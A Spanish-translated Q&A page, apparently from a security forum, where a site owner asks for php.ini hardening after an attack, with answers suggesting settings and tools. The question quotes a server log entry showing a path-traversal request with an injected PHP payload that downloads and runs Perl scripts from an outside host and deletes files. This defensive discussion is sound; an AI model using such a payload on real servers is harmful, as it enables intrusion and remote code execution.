configuración de seguridad php.ini después del ataque

Question

configuración de seguridad php.ini después del ataque

#1 de rook (3 votos)
#2 de Praveen V (1 votos)

7

Mi sitio web ha sido atacado y necesito una mejor práctica para un php.ini He leído un poco, pero aún no estoy seguro de haber cubierto la mayoría de las opciones.

aquí está mi configuración:

file_uploads = Off
upload_tmp_dir = /var/php_tmp
upload_max_filezize = 0M
allow_url_fopen = Off
allow_url_include = Off
safe_mode = On
display_errors = Off
magic_quotes_gpc = On
magic_quotes_runtime = On
max_file_uploads=0

aquí es lo que obtuve del registro de errores de la empresa de alojamiento web:

121.254.216.170 - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http://some.thesome.com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget http://some.thesome.com/etc/update.txt;perl update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?>"

hardening php

pregunta Andras Sebestyen 13.09.2011 - 00:21

fuente

2 respuestas

1

Esto podría ayudar a alguien.

expose_php = off
disable_functions = phpinfo
session.auto_start = 0
session.cookie_httponly = 1
session.cookie_secure = 1
session.name = sessId
session.hash_function = sha256
session.hash_bits_per_character = 5

respondido por el Praveen V 05.12.2012 - 09:40

fuente

Lea otras preguntas en las etiquetas hardening php

¿Alguna ventaja de rechazar una llamada (de un teléfono celular) frente a ignorarla? Mantener la privacidad de los datos del usuario en un entorno de nube como Google App Engine

score 3 · Accepted Answer

En primer lugar, este ataque no funcionará en la última rama 5.3 porque se han corregido los ataques de envenenamiento de bytes nulos para funciones de archivo-io. Dicho esto, ninguna de sus configuraciones se defenderá contra estos ataques, excepto por magic_qutoes_gpc en algunos casos de borde porque se escapará el byte nulo. Si bien, para ser honesto, deshabilitaría magic_qutoes_gpc, no debe confiar en él por seguridad y, con mucha frecuencia, malformará la entrada del usuario. magic_quotes_gpc se está eliminando en php6.

Para asegurarse de que php está configurado correctamente, debe ejecutar PHPSecInfo . También debe eliminar el bit de escritura de toda su raíz web y eliminar file_privs de su cuenta mysql. Aquí hay más información para bloquear php .